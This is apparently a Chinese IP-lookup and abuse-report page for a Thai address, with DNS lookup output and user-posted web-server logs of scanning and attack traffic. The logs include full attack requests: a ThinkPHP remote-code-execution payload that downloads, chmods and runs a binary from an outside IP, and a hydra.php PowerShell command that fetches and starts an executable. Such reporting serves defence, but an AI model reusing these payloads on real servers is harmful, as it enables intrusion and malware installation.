必须是合法有效的IP地址, 可以是IPv4或者是IPv6, 例如127.0.0.1或者2001:DB8:0:0:8:800:200C:417A
基本信息:

城市(city): unknown

省份(region): unknown

国家(country): Thailand

运营商(isp): unknown

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): unknown

用户上报:
暂无关于此IP的讨论, 沙发请点上方按钮
相同子网IP讨论:
暂无关于此IP所属子网相关IP的讨论.
WHOIS信息:
b
DIG信息:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 101.109.130.56
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 10221
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;101.109.130.56.			IN	A

;; AUTHORITY SECTION:
.			576	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2022022500 1800 900 604800 86400

;; Query time: 67 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Fri Feb 25 14:54:37 CST 2022
;; MSG SIZE  rcvd: 107
HOST信息:
56.130.109.101.in-addr.arpa domain name pointer node-pq0.pool-101-109.dynamic.totinternet.net.
NSLOOKUP信息:
Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
56.130.109.101.in-addr.arpa	name = node-pq0.pool-101-109.dynamic.totinternet.net.

Authoritative answers can be found from:
相关IP信息:
最新评论:
IP 类型 评论内容 时间
111.230.237.133 botsattackproxy
111.230.237.133 - - [23/Apr/2019:06:20:53 +0800] "CONNECT www.google.com:443 HTTP/1.1" 405 516 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.27.1 zlib/1.2.3 libidn/1.18 libssh2/1.4.2"
111.230.237.133 - - [23/Apr/2019:06:20:53 +0800] "GET http://www.google.com/ HTTP/1.1" 200 150450 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.27.1 zlib/1.2.3 libidn/1.18 libssh2/1.4.2"
2019-04-23 08:10:16
66.240.205.34 attack
66.240.205.34 - - [15/Apr/2019:16:54:43 +0800] "Gh0st\\xAD\\x00\\x00\\x00\\xE0\\x00\\x00\\x00x\\x9CKS``\\x98\\xC3\\xC0\\xC0\\xC0\\x06\\xC4\\x8C@\\xBCQ\\x96\\x81\\x81\\x09H\\x07\\xA7\\x16\\x95e&\\xA7*\\x04$&g+\\x182\\x94\\xF6\\xB000\\xAC\\xA8rc\\x00\\x01\\x11\\xA0\\x82\\x1F\\x5C`&\\x83\\xC7K7\\x86\\x19\\xE5n\\x0C9\\x95n\\x0C;\\x84\\x0F3\\xAC\\xE8sch\\xA8^\\xCF4'J\\x97\\xA9\\x82\\xE30\\xC3\\x91h]&\\x90\\xF8\\xCE\\x97S\\xCBA4L?2=\\xE1\\xC4\\x92\\x86\\x0B@\\xF5`\\x0CT\\x1F\\xAE\\xAF]" 400 182 "-" "-"
2019-04-15 16:55:20
101.226.114.193 attack
101.226.114.193 - - [22/Apr/2019:08:26:29 +0800] "GET /web/cgi-bin/hi3510/param.cgi?cmd%253Dgetp2pattr%2526cmd%253Dgetuserattr HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"
101.226.114.193 - - [22/Apr/2019:08:26:29 +0800] "GET /web/cgi-bin/hi3510/param.cgi?cmd%253Dgetp2pattr%2526cmd%253Dgetuserattr HTTP/1.1" 404 209 "http://118.25.52.138/web/cgi-bin/hi3510/param.cgi?cmd%253Dgetp2pattr%2526cmd%253Dgetuserattr" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"
2019-04-22 08:28:33
193.112.7.46 attackproxy
193.112.7.46 - - [23/Apr/2019:07:11:02 +0800] "CONNECT www.google.com:443 HTTP/1.1" 400 182 "-" "-" 
193.112.7.46 - - [23/Apr/2019:07:11:02 +0800] "GET http://www.google.com/ HTTP/1.1" 301 194 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.21 Basic ECC zlib/1.2.3 libidn/1.18 libssh2/1.4.2"
193.112.7.46 - - [23/Apr/2019:07:11:03 +0800] "\\x05\\x02\\x00\\x01" 400 182 "-" "-" 
193.112.7.46 - - [23/Apr/2019:07:11:03 +0800] "\\x05\\x02\\x00\\x01" 400 182 "-" "-" 
193.112.7.46 - - [23/Apr/2019:07:11:03 +0800] "\\x04\\x01\\x01\\xBBJV\\x97\\xA7\\x00" 400 182 "-" "-" 
193.112.7.46 - - [23/Apr/2019:07:11:03 +0800] "\\x04\\x01\\x00PJV\\x97\\xA7\\x00" 400 182 "-" "-"
2019-04-23 08:07:00
172.245.184.232 attack
172.245.184.232 - - [16/Apr/2019:16:17:39 +0800] "GET /Public/Wchat/js/cvphp.js HTTP/1.1" 404 481 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; KB974488)"
2019-04-16 16:19:38
200.53.15.17 attack
200.53.15.17 - - [21/Apr/2019:04:56:51 +0800] "GET /wp-login.php HTTP/1.1" 302 284 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"
200.53.15.17 - - [21/Apr/2019:04:56:52 +0800] "GET /wp-login.php HTTP/1.1" 200 7801 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"
200.53.15.17 - - [21/Apr/2019:04:56:52 +0800] "GET / HTTP/1.1" 301 283 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"
200.53.15.17 - - [21/Apr/2019:04:56:53 +0800] "GET / HTTP/1.1" 200 93842 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"
2019-04-21 06:59:00
138.91.125.32 bots
138.91.125.32 - - [23/Apr/2019:08:10:32 +0800] "GET //wp-includes/wlwmanifest.xml HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
138.91.125.32 - - [23/Apr/2019:08:10:32 +0800] "GET //xmlrpc.php?rsd HTTP/1.1" 308 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
138.91.125.32 - - [23/Apr/2019:08:10:32 +0800] "GET / HTTP/1.1" 200 10302 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
138.91.125.32 - - [23/Apr/2019:08:10:33 +0800] "GET //blog/wp-includes/wlwmanifest.xml HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
138.91.125.32 - - [23/Apr/2019:08:10:33 +0800] "GET //wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
2019-04-23 08:11:21
35.200.107.73 attack
35.200.107.73 - - [16/Apr/2019:21:17:31 +0800] "GET //blog/wp-includes/wlwmanifest.xml HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
35.200.107.73 - - [16/Apr/2019:21:17:31 +0800] "GET //wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
35.200.107.73 - - [16/Apr/2019:21:17:31 +0800] "GET //wp/wp-includes/wlwmanifest.xml HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
2019-04-16 21:34:35
178.62.232.43 botsattack
178.62.232.43 - - [18/Apr/2019:08:32:24 +0800] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu"
178.62.232.43 - - [18/Apr/2019:08:32:24 +0800] "GET /pma/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu"
178.62.232.43 - - [18/Apr/2019:08:32:24 +0800] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu"
178.62.232.43 - - [18/Apr/2019:08:32:24 +0800] "GET /phpmy/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu"
178.62.232.43 - - [18/Apr/2019:08:32:24 +0800] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 301 194 "-" "ZmEu"
2019-04-18 08:35:01
27.115.124.6 attack
莫名其妙put
27.115.124.6 - - [22/Apr/2019:12:13:32 +0800] "PUT /9082addcc2ac2e12.txt HTTP/1.1" 301 194 "-" "Python-urllib/2.7"
2019-04-22 12:14:22
50.63.197.101 attack
wordpress检测攻击
50.63.197.101 - - [18/Apr/2019:14:15:48 +0800] "GET /wordpress/wp-admin/ HTTP/1.1" 301 194 "-" "-"
2019-04-18 14:17:06
101.227.151.57 attack
101.227.151.57 - - [18/Apr/2019:17:29:20 +0800] "GET /program/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"
101.227.151.57 - - [18/Apr/2019:17:29:20 +0800] "GET /program/index.php HTTP/1.1" 404 209 "http://118.25.52.138/program/index.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"
2019-04-18 17:30:14
58.251.121.185 attack
58.251.121.185 - - [15/Apr/2019:14:51:57 +0800] "GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang%3Den HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"
58.251.121.185 - - [15/Apr/2019:14:51:57 +0800] "GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang%3Den HTTP/1.1" 404 209 "http://118.25.52.138/wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang%3Den" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"
2019-04-15 14:52:24
118.25.71.65 attack
118.25.71.65 - - [19/Apr/2019:15:56:16 +0800] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start%20C:/Windows/temp/rdoromzcvnzisoj23580.exe HTTP/1.1" 301 194 "http://118.25.52.138:80/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start C:/Windows/temp/rdoromzcvnzisoj23580.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.71.65 - - [19/Apr/2019:15:56:16 +0800] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start%20C:/Windows/temp/rdoromzcvnzisoj23580.exe HTTP/1.1" 404 232 "http://118.25.52.138:80/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start C:/Windows/temp/rdoromzcvnzisoj23580.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
2019-04-19 15:56:51
165.22.159.9 attack
165.22.159.9 - - [18/Apr/2019:08:05:25 +0800] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://46.101.210.172/bins/element.x86;cat%20element.x86%20%3E%20hitler13;chmod%20777%20hitler13;./hitler13%20thinkphp HTTP/1.1" 301 194 "-" "python-requests/2.12.4"
165.22.159.9 - - [18/Apr/2019:08:05:26 +0800] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://46.101.210.172/bins/element.x86;cat%20element.x86%20%3E%20hitler13;chmod%20777%20hitler13;./hitler13%20thinkphp HTTP/1.1" 404 209 "-" "python-requests/2.12.4"
165.22.159.9 - - [18/Apr/2019:08:05:26 +0800] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;curl%20-O%20http://46.101.210.172/bins/element.x86;cat%20element.x86%20%3E%20hitler13;chmod%20777%20hitler13;./hitler13%20thinkphp HTTP/1.1" 301 194 "-" "python-requests/2.12.4"
165.22.159.9 - - [18/Apr/2019:08:05:27 +0800] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;curl%20-O%20http://46.101.210.172/bins/element.x86;cat%20element.x86%20%3E%20hitler13;chmod%20777%20hitler13;./hitler13%20thinkphp HTTP/1.1" 404 209 "-" "python-requests/2.12.4"
2019-04-18 08:06:11

最近上报的IP列表

101.109.130.220 101.109.130.58 101.205.211.118 101.109.130.66
101.109.130.69 101.109.130.9 101.109.130.90 101.109.130.89
101.109.130.94 101.205.211.124 101.205.211.127 101.109.137.223
101.109.137.198 101.109.137.246 101.109.137.6 101.109.137.65
101.109.137.15 101.109.137.167 101.109.137.206 101.109.137.54